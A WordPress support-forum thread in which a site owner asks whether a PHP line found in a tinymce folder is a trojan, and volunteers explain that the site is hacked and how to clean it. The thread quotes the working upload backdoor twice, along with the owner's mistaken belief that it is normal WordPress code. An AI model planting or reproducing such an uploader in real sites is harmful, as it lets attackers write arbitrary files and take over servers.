Site suspended and now doesn't work

I think you need to work with your ISP for this. We can only support WordPress the application. We have no way to know if your ISP keeps backups or not. :/

You need to start working your way through these resources:

• https://codex.www.ads-software.com/FAQ_My_site_was_hacked
• https://www.ads-software.com/support/topic/268083#post-1065779
• https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
• https://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:

• https://sitecheck.sucuri.net/scanner/
• https://www.unmaskparasites.com/
• https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

My question IS about the application, my ISP, Fasthosts, is useless and can’t communicate properly or I would have solved it.
The line they say is a trojan, <?php if ($_FILES[‘F1l3’]) {move_uploaded_file($_FILES[‘F1l3’][‘tmp_name’], $_POST[‘Name’]); echo ‘OK’; } else { echo ‘You are forbidden!’; } ?> , is, according to everything I can google, a WordPress file which opens the program and has this line in it. Nowehere is it described as malicious, but a standard PHP code for moving files, and only allowing them to be moved/uploaded by PHP. How can anyone think it a trojan? See this: https://php.net/manual/en/function.move-uploaded-file.php
I don’t want ‘support’ merely an answer from someone who understands PHP and can tell me if this is correct code or a trojan.
Funnily, I thought this would be the place for WordPress experts.

@peter-simmons, Please don’t get personal.

You initially asked if online backups are kept by ISPs. We cannot know the answer to that question, hence my response that you should work with your ISP.

As for that file, I do not see a tinymce folder in SVN (this is what you should have installed): https://core.svn.www.ads-software.com/tags/4.5.3/wp-includes/

move_uploaded_file() is a PHP function, and can be used for good or bad.

Also, you should look at the links that @stevesterndatacom provided.

Have you checked the file index.php should exist in that location for the version of WP you’re running? It doesn’t exist in the latest version, and the fact the script is accepting $_FILES is worrying…

I’ve just updated WP to latest version, and looking at the remote server files in ftp it’s there still in the same directory and with the text it had before, ie.
<?php if ($_FILES[‘F1l3’]) {move_uploaded_file($_FILES[‘F1l3’][‘tmp_name’], $_POST[‘Name’]); echo ‘OK’; Exit;}

Previously I deleted the text completely and it semmed to make no difference to the site running. I just got another automatic message from the ISP that it’s again ‘compromised’ but not details of how.
As you say it doesn’t exsist in the latest version, that might mean it’s still there because nothing overwrote it? So perhaps I should delete the folder and see if that does it?

Yes, delete the folder and see if it is somehow recreated.

Your site is hacked. Please follow my advice above.

Although, on second thoughts, the themes folder must need something in this surely? Does the latest version not have that /tinymce/themes/ ?
I really haven’t a clue how WP works and wouldn’t understand any of those links given, though thank you for helping. I really wasn’t being personal, I actually thought this was where people knew how it worked and could advise. Perhaps my fault for not making clear what I was asking.

We know how it works and we are offering advice.

If you don’t want to get into the nitty gritty of cleaning a hacked site, there are companies that will do it for you for a fee — Sucuri and WordFence come to mind.

Your site is hacked. Please follow my advice above.

So deleting all files on the remote server and re uploading the backed up files doesn’t solve it?

not if the backed up files are also hacked. Please upload fresh copies of wp from the downloads page, and fresh copies of the theme and plugins

if the code came back that means there’s a file hiding on your site somewhere with code to keep adding the hack back.

I don’t know that it did come back. The edited file wasn’t changed back to what it had been [I checked], but the ISP has sent another warning. Most of my problem has been lack of communication from ISP, but I’m changing that.